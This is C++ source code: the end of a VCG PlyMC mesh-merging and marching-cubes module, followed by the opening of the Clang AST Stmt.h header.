else quality=w*(*vi).Q();
if(quality)
res |= B.SplatVert((*vi).P(),quality,(*vi).N(),(*vi).C());
}
}
if(!res) return false;
int vstp=0;
if(p.VerboseLevel>0) {
B.SlicedPPM(shortname.c_str(),std::string(SFormat("%02i",vstp)).c_str(),p.SliceNum );
B.SlicedPPMQ(shortname.c_str(),std::string(SFormat("%02i",vstp)).c_str(),p.SliceNum );
vstp++;
}
for(int i=0;i<p.WideNum;++i) {
B.Expand(math::ToRad(p.ExpAngleDeg));
if(p.VerboseLevel>1) B.SlicedPPM(shortname.c_str(),SFormat("%02ie",vstp++),p.SliceNum );
B.Refill(p.FillThr);
if(p.VerboseLevel>1) B.SlicedPPM(shortname.c_str(),SFormat("%02if",vstp++),p.SliceNum );
if(p.IntraSmoothFlag)
{
Volume <Voxelf> SM;
SM.Init(VV);
SM.CopySmooth(B,1,p.QualitySmoothAbs);
B=SM;
if(p.VerboseLevel>1) B.SlicedPPM(shortname.c_str(),SFormat("%02is",vstp++),p.SliceNum );
// if(VerboseLevel>1) B.SlicedPPMQ(shortname,SFormat("%02is",vstp),SliceNum );
}
}
if(p.SmoothNum>0)
{
Volume <Voxelf> SM;
SM.Init(VV);
SM.CopySmooth(B,1,p.QualitySmoothAbs);
B=SM;
if(p.VerboseLevel>1) B.SlicedPPM(shortname.c_str(),SFormat("%02isf",vstp++),p.SliceNum );
}
VV.Merge(B);
if(p.VerboseLevel>0) VV.SlicedPPMQ(std::string("merge_").c_str(),shortname.c_str(),p.SliceNum );
return true;
}
void GetSubVolumeTag(Point3i div,Point3i pos,std::string &subtag)
{
char buf[32];
if (div[0]<= 10 && div[1]<= 10 && div[2]<= 10 ) sprintf(buf,"_%01d%01d%01d",pos[0],pos[1],pos[2]);
else if(div[0]<= 100 && div[1]<= 100 && div[2]<= 100 ) sprintf(buf,"_%02d%02d%02d",pos[0],pos[1],pos[2]);
else sprintf(buf,"_%03d%03d%03d",pos[0],pos[1],pos[2]);
subtag=buf;
}
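  // Example (illustration only): with div=(4,4,4) and pos=(1,2,3) one digit
  // per component suffices, yielding "_123"; with div=(16,4,4) two digits are
  // used per component and the same pos yields "_010203".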
void ProcessCells(CallBackPosTotal *cb=0)
{
unsigned long long startTick=osg::Timer::instance()->tick();
printf("bbox scanning...\n"); fflush(stdout);
Matrix44f Id; Id.SetIdentity();
MP.InitBBox();
printf("Completed BBox Scanning \n");
Box3f fullb = MP.fullBB();
assert (!fullb.IsNull());
assert (!fullb.IsEmpty());
    // Compute grid size
Point3i gridsize;
Point3f voxdim;
fullb.Offset(fullb.Diag() * 0.1 );
voxdim = fullb.max - fullb.min;
int TotAdd=0,TotMC=0,TotSav=0;
// if kcell==0 the number of cells is computed starting from required voxel size;
__int64 cells;
if(p.NCell>0) cells = (__int64)(p.NCell)*(__int64)(1000);
else cells = (__int64)(voxdim[0]/p.VoxSize) * (__int64)(voxdim[1]/p.VoxSize) *(__int64)(voxdim[2]/p.VoxSize) ;
Box3i globalBox;
{
Volume<Voxelf> B; // local to this small block
Box3f fullbf; fullbf.Import(fullb);
B.Init(cells,fullbf,p.IDiv,p.IPosS);
B.Dump(stdout);
if(p.WideSize>0) p.WideNum=p.WideSize/B.voxel.Norm();
globalBox=B.SubPart;
// Now the volume has been determined; the quality threshold in absolute units can be computed
if(p.QualitySmoothAbs==0)
p.QualitySmoothAbs= p.QualitySmoothVox * B.voxel.Norm();
}
bool res=false;
/*vVV.resize(p.IDiv[0]);
for(int i=0; i<vVV.size(); i++){
vVV[i].resize(p.IDiv[1]);
for(int j=0; j<vVV[i].size(); j++)
vVV[i][j].resize(p.IDiv[2]);
}*/
//#pragma omp parallel for
for(int xx=p.IPosS[0];xx<=p.IPosE[0];++xx)
for(int yy=p.IPosS[1];yy<=p.IPosE[1];++yy)
for(int zz=p.IPosS[2];zz<=p.IPosE[2];++zz)
if((zz+(yy*p.IDiv[2])+(xx*p.IDiv[2]*p.IDiv[1])) >=
(p.IPosB[2]+(p.IPosB[1]*p.IDiv[2])+(p.IPosB[0]*p.IDiv[2]*p.IDiv[1]))) // skip until IPos >= IPosB
{
printf("----------- SubBlock %2i %2i %2i ----------\n",xx,yy,zz);
//Volume<Voxelf> B;
Volume<Voxelf> VV;// =vVV[xx][yy][zz];
int t0=clock();
Box3f fullbf; fullbf.Import(fullb);
//VV.DeltaVoxelSafe=1;
Point3i IPos;
IPos[0]=xx;
IPos[1]=yy;
IPos[2]=zz;
VV.Init(cells,fullbf,p.IDiv,IPos);
printf("\n\n --------------- Allocated subcells. %i\n",VV.Allocated());
std::string filename=p.basename;
if(p.IDiv!=Point3i(1,1,1))
{
std::string subvoltag;
VV.GetSubVolumeTag(subvoltag);
filename+=subvoltag;
}
/********** Main loop: scan all the meshes *********/
for(int i=0;i<MP.size();++i)
{
Box3f bbb= MP.bb(i);
/**********************/
if(cb) cb((i+1),MP.size(),startTick,"Vol");
/**********************/
// if bbox of mesh #i is part of the subblock, then process it
if(bbb.Collide(VV.SubBoxSafe))
{
SMesh *sm;
if(!MP.Find(i,sm) )
{
res = InitMesh(VV,*sm,MP.MeshName(i).c_str(),MP.Tr(i));
if(!res)
{
printf("Failed Init of mesh %s",MP.MeshName(i).c_str());
//break;
}
}
res |= AddMeshToVolumeM(VV,*sm, MP.MeshName(i),MP.W(i));
}
}
/* for(int k=VV.SubPart.min[2];k<VV.SubPart.max[2];++k)
for(int j=VV.SubPart.min[1];j<VV.SubPart.max[1];++j)
for(int i=VV.SubPart.min[0];i<VV.SubPart.max[0];++i){
float fv=VV.V(i,j,k).V();
if(fv != 0)
printf("aa %f---%d %d %d\n",fv,k,j,i);
}*/
//B.Normalize(1);
printf("End Scanning\n");
if(p.OffsetFlag)
{
VV.Offset(p.OffsetThr);
if (p.VerboseLevel>0)
{
VV.SlicedPPM("finaloff","__",p.SliceNum);
VV.SlicedPPMQ("finaloff","__",p.SliceNum);
}
}
//if(p.VerboseLevel>1) VV.SlicedPPM(filename.c_str(),SFormat("_%02im",i),p.SliceNum );
for(int i=0;i<p.RefillNum;++i)
{
//VV.Refill(3,6);
if(p.VerboseLevel>1) VV.SlicedPPM(filename.c_str(),SFormat("_%02imsr",i),p.SliceNum );
//if(VerboseLevel>1) VV.SlicedPPMQ(filename,SFormat("_%02ips",i++),SliceNum );
}
for(int i=0;i<p.SmoothNum;++i)
{
Volume <Voxelf> SM;
SM.Init(VV);
printf("%2i/%2i: ",i,p.SmoothNum);
SM.CopySmooth(VV,1,p.QualitySmoothAbs);
VV=SM;
// VV.Refill(3,6);
if(p.VerboseLevel>1) VV.SlicedPPM(filename.c_str(),SFormat("_%02ims",i),p.SliceNum );
}
int t1=clock(); //--------
TotAdd+=t1-t0;
printf("Extracting surface...\r");
if (p.VerboseLevel>0)
{
VV.SlicedPPM("final","__",p.SliceNum);
VV.SlicedPPMQ("final","__",p.SliceNum);
}
std::string fn="test";
if(1){//VV.div!=Point3i(1,1,1)) {
std::string subvoltag;
VV.GetSubVolumeTag(subvoltag);
fn+=subvoltag;
}
std::string datname=fn;
std::string rawname=fn;
rawname+=".raw";
VV.Write(rawname,0,0);
//MCMesh me;
//
}
}
Box3i getBBoxFromFile(std::string filename){
FILE *fp;
fp=fopen(filename.c_str(),"rb");
if(!fp)
{
printf("Error: unable ro open output volume file '%s'\n",filename.c_str());
exit(-1);
}
int64_t cells; Box3<float> bb; Point3i div; Point3i pos;
Point3i sz;
fread(&cells,sizeof(int64_t),1,fp);
float bbtmp[6];
fread(&bbtmp[0],sizeof(float),6,fp);
for(int i=0;i<3; i++)
bb.min[i]=bbtmp[i];
for(int i=0;i<3; i++)
bb.max[i]=bbtmp[i+3];
int pttmp[3];
fread(&pttmp[0],sizeof(int),3,fp);
for(int i=0;i<3; i++)
div[i]=pttmp[i];
fread(&pttmp[0],sizeof(int),3,fp);
for(int i=0;i<3; i++){
pos[i]=pttmp[i];
}
fread(&pttmp[0],sizeof(int),3,fp);
for(int i=0;i<3; i++){
sz[i]=pttmp[i];
}
fclose(fp);
Box3i SubPart,SubPartSafe;
// Setting the subpart under analysis
for(int k=0;k<3;++k)
{
SubPart.min[k]= pos[k]*sz[k]/div[k];
SubPart.max[k]=(pos[k]+1)*sz[k]/div[k];
// SubBox.min[k]= bbox.min[k]+SubPart.min[k]*voxel[k];
// SubBox.max[k]= bbox.min[k]+SubPart.max[k]*voxel[k];
}
// Setting the safe subpart under analysis
SubPartSafe=SubPart;
for(int k=0;k<3;++k)
{
SubPartSafe.min[k] -= Volume<Voxelf>::BLOCKSIDE();
SubPartSafe.max[k] += Volume<Voxelf>::BLOCKSIDE();
if( SubPartSafe.min[k]< 0 ) SubPartSafe.min[k] = 0;
if( SubPartSafe.max[k]> sz[k] ) SubPartSafe.max[k] = sz[k];
// SubBoxSafe.min[k]= bbox.min[k]+SubPartSafe.min[k]*voxel[k];
// SubBoxSafe.max[k]= bbox.min[k]+SubPartSafe.max[k]*voxel[k];
}
return SubPartSafe;
}
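// Note: the .raw header decoded above is, in file order:
//   int64_t cells; float bb[6]; int div[3]; int pos[3]; int sz[3];
// A matching struct is sketched below for reference only (hypothetical; the
// field-by-field freads above are kept to avoid struct padding issues):
//   struct RawVolHeader { int64_t cells; float bb[6]; int div[3], pos[3], sz[3]; };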
void ProcessNormalize(CallBackPosTotal *cb=0)
{
int cnt=0;
std::vector< std::vector<std::vector<Volume<Voxelf> > > >vVV;
vVV.resize(p.IDiv[0]);
for(int i=0; i<vVV.size(); i++){
vVV[i].resize(p.IDiv[1]);
for(int j=0; j<vVV[i].size(); j++)
vVV[i][j].resize(p.IDiv[2]);
}
for(int xx=p.IPosS[0];xx<=p.IPosE[0];++xx)
for(int yy=p.IPosS[1];yy<=p.IPosE[1];++yy)
for(int zz=p.IPosS[2];zz<=p.IPosE[2];++zz)
if((zz+(yy*p.IDiv[2])+(xx*p.IDiv[2]*p.IDiv[1])) >=
(p.IPosB[2]+(p.IPosB[1]*p.IDiv[2])+(p.IPosB[0]*p.IDiv[2]*p.IDiv[1]))) // skip until IPos >= IPosB
{
std::string fn="test";
if(1){//VV.div!=Point3i(1,1,1)) {
std::string subvoltag;
Point3i pos(xx,yy,zz);
GetSubVolumeTag(p.IDiv,pos,subvoltag);
fn+=subvoltag;
}
std::string datname=fn;
std::string rawname=fn;
rawname+=".raw";
Box3i ibox;
printf("Loading %s\n ",rawname.c_str());
vVV[xx][yy][zz].Read(rawname);
}
printf("Done Loading\n");
//#pragma omp parallel for
for(int xx=p.IPosS[0];xx<=p.IPosE[0];++xx)
for(int yy=p.IPosS[1];yy<=p.IPosE[1];++yy)
for(int zz=p.IPosS[2];zz<=p.IPosE[2];++zz)
if((zz+(yy*p.IDiv[2])+(xx*p.IDiv[2]*p.IDiv[1])) >=
(p.IPosB[2]+(p.IPosB[1]*p.IDiv[2])+(p.IPosB[0]*p.IDiv[2]*p.IDiv[1]))) // skip until IPos >= IPosB
{
std::string fn="test";
Volume<Voxelf> &VV= vVV[xx][yy][zz];
if(1){//VV.div!=Point3i(1,1,1)) {
std::string subvoltag;
Point3i pos(xx,yy,zz);
GetSubVolumeTag(p.IDiv,pos,subvoltag);
fn+=subvoltag;
}
std::string datname=fn;
std::string rawname=fn;
rawname+=".raw";
Box3i ibox;
// VV.Read(rawname);
bool madeChange=false;
for(int xxx=p.IPosS[0];xxx<=p.IPosE[0];++xxx)
for(int yyy=p.IPosS[1];yyy<=p.IPosE[1];++yyy){
if(xxx==xx && yyy==yy)
continue;
std::string fn_compare="test";
if(1){//VV.div!=Point3i(1,1,1)) {
std::string subvoltag_compare;
Point3i pos(xxx,yyy,zz);
GetSubVolumeTag(p.IDiv,pos,subvoltag_compare);
fn_compare+=subvoltag_compare;
fn_compare+=".raw";
}
Volume<Voxelf> &VV_compare=vVV[xxx][yyy][zz];
Box3i SubPartSafeCompare=VV_compare.SubPartSafe;
// Box3i SubPartSafeCompare=getBBoxFromFile(fn_compare);
if(!SubPartSafeCompare.Collide(VV.SubPartSafe))
continue;
// VV_compare.Read(fn_compare);
ibox.min[0] = std::max(SubPartSafeCompare.min[0],VV.SubPartSafe.min[0]);
ibox.min[1] = std::max(SubPartSafeCompare.min[1],VV.SubPartSafe.min[1]);
ibox.min[2] = std::max(SubPartSafeCompare.min[2],VV.SubPartSafe.min[2]);
ibox.max[0] = std::min(SubPartSafeCompare.max[0],VV.SubPartSafe.max[0]);
ibox.max[1] = std::min(SubPartSafeCompare.max[1],VV.SubPartSafe.max[1]);
ibox.max[2] = std::min(SubPartSafeCompare.max[2],VV.SubPartSafe.max[2]);
// ibox=globalBox;
/* printf("%d %d %d -- %d %d %d\n",ibox.min[0],ibox.min[1],ibox.min[2],
ibox.max[0],ibox.max[1],ibox.max[2]);
printf("A %d %d %d -- %d %d %d\n",SubPartSafe.min[0],SubPartSafe.min[1],SubPartSafe.min[2],
SubPartSafe.max[0],SubPartSafe.max[1],SubPartSafe.max[2]);
printf("B %d %d %d -- %d %d %d\n",VV.SubPartSafe.min[0],VV.SubPartSafe.min[1],VV.SubPartSafe.min[2],
VV.SubPartSafe.max[0],VV.SubPartSafe.max[1],VV.SubPartSafe.max[2]);*/
for(int xxxx=ibox.min[0];xxxx<=ibox.max[0];++xxxx)
for(int yyyy=ibox.min[1];yyyy<=ibox.max[1];++yyyy)
for(int zzzz=ibox.min[2];zzzz<=ibox.max[2];++zzzz){
// printf("%d %d %d\n",xxxx,yyyy,zzzz);
if(VV.Val(xxxx,yyyy,zzzz) == 0.0)
continue;
if(VV_compare.Val(xxxx,yyyy,zzzz)!=VV.Val(xxxx,yyyy,zzzz)){
#pragma omp critical
{
// printf("%f %f\n",VV_compare.Val(xxxx,yyyy,zzzz),VV.Val(xxxx,yyyy,zzzz));
if(VV_compare.Val(xxxx,yyyy,zzzz) == 1000.000)
;//VV_compare.V(xxxx,yyyy,zzzz).Set(VV.V(xxxx,yyyy,zzzz));
else if(VV.Val(xxxx,yyyy,zzzz) == 1000.000)
VV.V(xxxx,yyyy,zzzz).Set(VV_compare.V(xxxx,yyyy,zzzz));
else{
VV_compare.V(xxxx,yyyy,zzzz).Blend(VV.V(xxxx,yyyy,zzzz),0.5);
VV.V(xxxx,yyyy,zzzz).Set( VV_compare.V(xxxx,yyyy,zzzz));
}
madeChange=true;
}
}
// vVV[xxx][yyy][zz].V(xxxx,yyyy,zzzz).Set(VV.V(xxxx,yyyy,zzzz));
// VV.V(xxxx,yyyy,zzzz).SetB(false);
}
}
/* std::string filename="final";
if(p.IDiv!=Point3i(1,1,1))
{
std::string subvoltag;
VV.GetSubVolumeTag(subvoltag);
filename+=subvoltag;
}
VV.SlicedPPM(filename.c_str(),"__",1);
VV.SlicedPPMQ(filename.c_str(),"__",1);
VV.Dump(stdout);*/
if(madeChange)
VV.Write(rawname,0,0);
printf("----------- Equalizing corner SubBlock %2i %2i %2i ----------\n",xx,yy,zz);
//Volume<Voxelf> B;
}
//#pragma omp parallel for
}
void ProcessMC(CallBackPosTotal *cb=0)
{
int TotAdd=0,TotMC=0,TotSav=0;
for(int xx=p.IPosS[0];xx<=p.IPosE[0];++xx)
for(int yy=p.IPosS[1];yy<=p.IPosE[1];++yy)
for(int zz=p.IPosS[2];zz<=p.IPosE[2];++zz)
if((zz+(yy*p.IDiv[2])+(xx*p.IDiv[2]*p.IDiv[1])) >=
(p.IPosB[2]+(p.IPosB[1]*p.IDiv[2])+(p.IPosB[0]*p.IDiv[2]*p.IDiv[1]))) // skip until IPos >= IPosB
{
//Volume<Voxelf> &VV =vVV[xx][yy][zz];
Volume<Voxelf> VV;
std::string fn="test";
if(1){//VV.div!=Point3i(1,1,1)) {
std::string subvoltag;
Point3i pos(xx,yy,zz);
GetSubVolumeTag(p.IDiv,pos,subvoltag);
fn+=subvoltag;
}
std::string datname=fn;
std::string rawname=fn;
rawname+=".raw";
VV.Read(rawname);
std::string filename=p.basename;
if(p.IDiv!=Point3i(1,1,1))
{
std::string subvoltag;
VV.GetSubVolumeTag(subvoltag);
filename+=subvoltag;
}
bool res=true;
MCMesh me;
if(res)
{
typedef vcg::tri::TrivialWalker<MCMesh, Volume <Voxelf> > Walker;
typedef vcg::tri::MarchingCubes<MCMesh, Walker> MarchingCubes;
//typedef vcg::tri::ExtendedMarchingCubes<MCMesh, Walker> ExtendedMarchingCubes;
Walker walker;
MarchingCubes mc(me, walker);
Box3i currentSubBox=VV.SubPartSafe;
Point3i currentSubBoxRes=VV.ssz;
/**********************/
cb(50,50,0,"Step 2: Marching Cube...");
/**********************/
walker.BuildMesh(me,VV,mc,currentSubBox,currentSubBoxRes);
typename MCMesh::VertexIterator vi;
Box3f bbb; bbb.Import(VV.SubPart);
for(vi=me.vert.begin();vi!=me.vert.end();++vi)
{
if(!bbb.IsIn((*vi).P()))
vcg::tri::Allocator< MCMesh >::DeleteVertex(me,*vi);
VV.DeInterize((*vi).P());
}
typename MCMesh::FaceIterator fi;
for (fi = me.face.begin(); fi != me.face.end(); ++fi)
{
if((*fi).V(0)->IsD() || (*fi).V(1)->IsD() || (*fi).V(2)->IsD() )
vcg::tri::Allocator< MCMesh >::DeleteFace(me,*fi);
else std::swap((*fi).V1(0), (*fi).V2(0));
}
int t2=clock(); //--------
// TotMC+=t2-t1;
if(me.vn >0 || me.fn >0)
{
p.OutNameVec.push_back(filename+std::string(".ply"));
int saveMask=0;
if(p.MergeColor) saveMask |= tri::io::Mask::IOM_VERTCOLOR ;
tri::io::ExporterPLY<MCMesh>::Save(me,p.OutNameVec.back().c_str(),saveMask);
if(p.SimplificationFlag)
{
/**********************/
cb(50,50,0,"Step 3: Simplify mesh...");
/**********************/
p.OutNameSimpVec.push_back(filename+std::string(".d.ply"));
me.face.EnableVFAdjacency();
MCSimplify<MCMesh>(me, VV.voxel[0]/4.0);
tri::Allocator<MCMesh>::CompactFaceVector(me);
me.face.EnableFFAdjacency();
tri::Clean<MCMesh>::RemoveTVertexByFlip(me,20,true);
tri::Clean<MCMesh>::RemoveFaceFoldByFlip(me);
tri::io::ExporterPLY<MCMesh>::Save(me,p.OutNameSimpVec.back().c_str(),saveMask);
}
}
int t3=clock(); //--------
TotSav+=t3-t2;
}
printf("Mesh Saved '%s': %8d vertices, %8d faces \n",(filename+std::string(".ply")).c_str(),me.vn,me.fn);
printf("Adding Meshes %8i\n",TotAdd);
printf("MC %8i\n",TotMC);
printf("Saving %8i\n",TotSav);
printf("Total %8i\n",TotAdd+TotMC+TotSav);
}
else
{
printf("----------- skipping SubBlock %2i %2i %2i ----------\n",xx,yy,zz);
}
}
}; //end PlyMC class
template < class MeshType>
class PlyMCTriEdgeCollapse: public MCTriEdgeCollapse< MeshType, PlyMCTriEdgeCollapse<MeshType> > {
public:
typedef MCTriEdgeCollapse< MeshType, PlyMCTriEdgeCollapse > MCTEC;
typedef typename MeshType::VertexType::EdgeType EdgeType;
inline PlyMCTriEdgeCollapse( const EdgeType &p, int i) :MCTEC(p,i){}
};
template< class MeshType>
void MCSimplify( MeshType &m, float absoluteError, bool preserveBB, vcg::CallBackPos *cb)
{
typedef PlyMCTriEdgeCollapse<MeshType> MyColl;
tri::UpdateBounding<MeshType>::Box(m);
tri::UpdateTopology<MeshType>::VertexFace(m);
vcg::LocalOptimization<MeshType> DeciSession(m);
MyColl::bb()=m.bbox;
MyColl::preserveBBox()=preserveBB;
if(absoluteError==0)
{
// Guess the marching-cube cell side.
// In an MC mesh the vertices lie on the edges of the cells, and the mesh edges lie (mostly) on the faces of the cells.
// If two vertices lie on the same xy face of a cell they share the same z coordinate.
std::vector<float> ZSet;
typename MeshType::FaceIterator fi;
for(fi = m.face.begin();fi!=m.face.end();++fi)
if(!(*fi).IsD())
{
Point3f v0=(*fi).V(0)->P();
Point3f v1=(*fi).V(1)->P();
Point3f v2=(*fi).V(2)->P();
if(v0[2]==v1[2] && v0[1]!=v1[1] && v0[0]!=v1[0]) ZSet.push_back(v0[2]);
if(v0[2]==v2[2] && v0[1]!=v2[1] && v0[0]!=v2[0]) ZSet.push_back(v0[2]);
if(v1[2]==v2[2] && v1[1]!=v2[1] && v1[0]!=v2[0]) ZSet.push_back(v1[2]);
if(ZSet.size()>100) break;
}
std::sort(ZSet.begin(),ZSet.end());
std::vector<float>::iterator lastV = std::unique(ZSet.begin(),ZSet.end());
ZSet.resize(lastV-ZSet.begin());
float Delta=0;
for(size_t i = 0; i+1 < ZSet.size(); ++i)
{
Delta = std::max(ZSet[i+1]-ZSet[i],Delta);
//qDebug("%f",Delta);
}
absoluteError= Delta/4.0f;
}
//qDebug("Simplifying at absoluteError=%f",absoluteError);
float TargetError = absoluteError;
char buf[1024];
DeciSession.template Init< MyColl > ();
MyColl::areaThr()=TargetError*TargetError;
DeciSession.SetTimeBudget(1.0f);
if(TargetError < std::numeric_limits<float>::max() ) DeciSession.SetTargetMetric(TargetError);
while(DeciSession.DoOptimization() && DeciSession.currMetric < TargetError)
{
sprintf(buf,"Simplyfing %7i err %9g \r",m.fn,DeciSession.currMetric);
if (cb) cb(int(100.0f*DeciSession.currMetric/TargetError),buf);
}
}
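// Usage sketch, mirroring the call sequence in ProcessMC above (an absolute
// error of 0 triggers the MC cell-side guess; VF adjacency must be enabled
// before calling, and the face vector compacted afterwards):
//
//   me.face.EnableVFAdjacency();
//   MCSimplify<MCMesh>(me, 0.0f); // 0 => autodetect the MC cell side
//   tri::Allocator<MCMesh>::CompactFaceVector(me);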
} // end namespace tri
} // end namespace vcg
#endif
|
Stmt.h | //===- Stmt.h - Classes for representing statements -------------*- C++ -*-===//
//
// The LLVM Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
// And has the following additional copyright:
//
// (C) Copyright 2016-2020 Xilinx, Inc.
// All Rights Reserved.
//
//===----------------------------------------------------------------------===//
//
// This file defines the Stmt interface and subclasses.
//
//===----------------------------------------------------------------------===//
#ifndef LLVM_CLANG_AST_STMT_H
#define LLVM_CLANG_AST_STMT_H
#include "clang/AST/DeclGroup.h"
#include "clang/AST/StmtIterator.h"
#include "clang/Basic/CapturedStmt.h"
#include "clang/Basic/IdentifierTable.h"
#include "clang/Basic/LLVM.h"
#include "clang/Basic/SourceLocation.h"
#include "llvm/ADT/ArrayRef.h"
#include "llvm/ADT/PointerIntPair.h"
#include "llvm/ADT/StringRef.h"
#include "llvm/ADT/iterator.h"
#include "llvm/ADT/iterator_range.h"
#include "llvm/Support/Casting.h"
#include "llvm/Support/Compiler.h"
#include "llvm/Support/ErrorHandling.h"
#include <algorithm>
#include <cassert>
#include <cstddef>
#include <iterator>
#include <string>
namespace llvm {
class FoldingSetNodeID;
} // namespace llvm
namespace clang {
class ASTContext;
class Attr;
class CapturedDecl;
class Decl;
class Expr;
class LabelDecl;
class ODRHash;
class PrinterHelper;
struct PrintingPolicy;
class RecordDecl;
class SourceManager;
class StringLiteral;
class Token;
class VarDecl;
//===----------------------------------------------------------------------===//
// AST classes for statements.
//===----------------------------------------------------------------------===//
/// Stmt - This represents one statement.
///
class alignas(void *) Stmt {
public:
enum StmtClass {
NoStmtClass = 0,
#define STMT(CLASS, PARENT) CLASS##Class,
#define STMT_RANGE(BASE, FIRST, LAST) \
first##BASE##Constant=FIRST##Class, last##BASE##Constant=LAST##Class,
#define LAST_STMT_RANGE(BASE, FIRST, LAST) \
first##BASE##Constant=FIRST##Class, last##BASE##Constant=LAST##Class
#define ABSTRACT_STMT(STMT)
#include "clang/AST/StmtNodes.inc"
};
// Make vanilla 'new' and 'delete' illegal for Stmts.
protected:
friend class ASTStmtReader;
friend class ASTStmtWriter;
void *operator new(size_t bytes) noexcept {
llvm_unreachable("Stmts cannot be allocated with regular 'new'.");
}
void operator delete(void *data) noexcept {
llvm_unreachable("Stmts cannot be released with regular 'delete'.");
}
class StmtBitfields {
friend class Stmt;
/// \brief The statement class.
unsigned sClass : 8;
};
enum { NumStmtBits = 8 };
class CompoundStmtBitfields {
friend class CompoundStmt;
unsigned : NumStmtBits;
unsigned NumStmts : 32 - NumStmtBits;
};
class IfStmtBitfields {
friend class IfStmt;
unsigned : NumStmtBits;
unsigned IsConstexpr : 1;
};
class ExprBitfields {
friend class ASTStmtReader; // deserialization
friend class AtomicExpr; // ctor
friend class BlockDeclRefExpr; // ctor
friend class CallExpr; // ctor
friend class CXXConstructExpr; // ctor
friend class CXXDependentScopeMemberExpr; // ctor
friend class CXXNewExpr; // ctor
friend class CXXUnresolvedConstructExpr; // ctor
friend class DeclRefExpr; // computeDependence
friend class DependentScopeDeclRefExpr; // ctor
friend class DesignatedInitExpr; // ctor
friend class Expr;
friend class InitListExpr; // ctor
friend class ObjCArrayLiteral; // ctor
friend class ObjCDictionaryLiteral; // ctor
friend class ObjCMessageExpr; // ctor
friend class OffsetOfExpr; // ctor
friend class OpaqueValueExpr; // ctor
friend class OverloadExpr; // ctor
friend class ParenListExpr; // ctor
friend class PseudoObjectExpr; // ctor
friend class ShuffleVectorExpr; // ctor
unsigned : NumStmtBits;
unsigned ValueKind : 2;
unsigned ObjectKind : 3;
unsigned TypeDependent : 1;
unsigned ValueDependent : 1;
unsigned InstantiationDependent : 1;
unsigned ContainsUnexpandedParameterPack : 1;
};
enum { NumExprBits = 17 };
class CharacterLiteralBitfields {
friend class CharacterLiteral;
unsigned : NumExprBits;
unsigned Kind : 3;
};
enum APFloatSemantics {
IEEEhalf,
IEEEsingle,
IEEEdouble,
x87DoubleExtended,
IEEEquad,
PPCDoubleDouble
};
class FloatingLiteralBitfields {
friend class FloatingLiteral;
unsigned : NumExprBits;
unsigned Semantics : 3; // Provides semantics for APFloat construction
unsigned IsExact : 1;
};
class UnaryExprOrTypeTraitExprBitfields {
friend class UnaryExprOrTypeTraitExpr;
unsigned : NumExprBits;
unsigned Kind : 3;
unsigned IsType : 1; // true if operand is a type, false if an expression.
};
class DeclRefExprBitfields {
friend class ASTStmtReader; // deserialization
friend class DeclRefExpr;
unsigned : NumExprBits;
unsigned HasQualifier : 1;
unsigned HasTemplateKWAndArgsInfo : 1;
unsigned HasFoundDecl : 1;
unsigned HadMultipleCandidates : 1;
unsigned RefersToEnclosingVariableOrCapture : 1;
};
class CastExprBitfields {
friend class CastExpr;
unsigned : NumExprBits;
unsigned Kind : 6;
unsigned BasePathSize : 32 - 6 - NumExprBits;
};
class CallExprBitfields {
friend class CallExpr;
unsigned : NumExprBits;
unsigned NumPreArgs : 1;
};
class ExprWithCleanupsBitfields {
friend class ASTStmtReader; // deserialization
friend class ExprWithCleanups;
unsigned : NumExprBits;
// When false, it must not have side effects.
unsigned CleanupsHaveSideEffects : 1;
unsigned NumObjects : 32 - 1 - NumExprBits;
};
class PseudoObjectExprBitfields {
friend class ASTStmtReader; // deserialization
friend class PseudoObjectExpr;
unsigned : NumExprBits;
// These don't need to be particularly wide, because they're
// strictly limited by the forms of expressions we permit.
unsigned NumSubExprs : 8;
unsigned ResultIndex : 32 - 8 - NumExprBits;
};
class ObjCIndirectCopyRestoreExprBitfields {
friend class ObjCIndirectCopyRestoreExpr;
unsigned : NumExprBits;
unsigned ShouldCopy : 1;
};
class InitListExprBitfields {
friend class InitListExpr;
unsigned : NumExprBits;
/// Whether this initializer list originally had a GNU array-range
/// designator in it. This is a temporary marker used by CodeGen.
unsigned HadArrayRangeDesignator : 1;
};
class TypeTraitExprBitfields {
friend class ASTStmtReader;
friend class ASTStmtWriter;
friend class TypeTraitExpr;
unsigned : NumExprBits;
/// \brief The kind of type trait, which is a value of a TypeTrait enumerator.
unsigned Kind : 8;
/// \brief If this expression is not value-dependent, this indicates whether
/// the trait evaluated true or false.
unsigned Value : 1;
/// \brief The number of arguments to this type trait.
unsigned NumArgs : 32 - 8 - 1 - NumExprBits;
};
class CoawaitExprBitfields {
friend class CoawaitExpr;
unsigned : NumExprBits;
unsigned IsImplicit : 1;
};
union {
StmtBitfields StmtBits;
CompoundStmtBitfields CompoundStmtBits;
IfStmtBitfields IfStmtBits;
ExprBitfields ExprBits;
CharacterLiteralBitfields CharacterLiteralBits;
FloatingLiteralBitfields FloatingLiteralBits;
UnaryExprOrTypeTraitExprBitfields UnaryExprOrTypeTraitExprBits;
DeclRefExprBitfields DeclRefExprBits;
CastExprBitfields CastExprBits;
CallExprBitfields CallExprBits;
ExprWithCleanupsBitfields ExprWithCleanupsBits;
PseudoObjectExprBitfields PseudoObjectExprBits;
ObjCIndirectCopyRestoreExprBitfields ObjCIndirectCopyRestoreExprBits;
InitListExprBitfields InitListExprBits;
TypeTraitExprBitfields TypeTraitExprBits;
CoawaitExprBitfields CoawaitBits;
};
public:
// Only allow allocation of Stmts using the allocator in ASTContext
// or by doing a placement new.
void* operator new(size_t bytes, const ASTContext& C,
unsigned alignment = 8);
void* operator new(size_t bytes, const ASTContext* C,
unsigned alignment = 8) {
return operator new(bytes, *C, alignment);
}
void *operator new(size_t bytes, void *mem) noexcept { return mem; }
void operator delete(void *, const ASTContext &, unsigned) noexcept {}
void operator delete(void *, const ASTContext *, unsigned) noexcept {}
void operator delete(void *, size_t) noexcept {}
void operator delete(void *, void *) noexcept {}
public:
/// \brief A placeholder type used to construct an empty shell of a
/// type, that will be filled in later (e.g., by some
/// de-serialization).
struct EmptyShell {};
protected:
/// Iterator for iterating over Stmt * arrays that contain only Expr *
///
/// This is needed because AST nodes use Stmt* arrays to store
/// references to children (to be compatible with StmtIterator).
struct ExprIterator
: llvm::iterator_adaptor_base<ExprIterator, Stmt **,
std::random_access_iterator_tag, Expr *> {
ExprIterator() : iterator_adaptor_base(nullptr) {}
ExprIterator(Stmt **I) : iterator_adaptor_base(I) {}
reference operator*() const {
assert((*I)->getStmtClass() >= firstExprConstant &&
(*I)->getStmtClass() <= lastExprConstant);
return *reinterpret_cast<Expr **>(I);
}
};
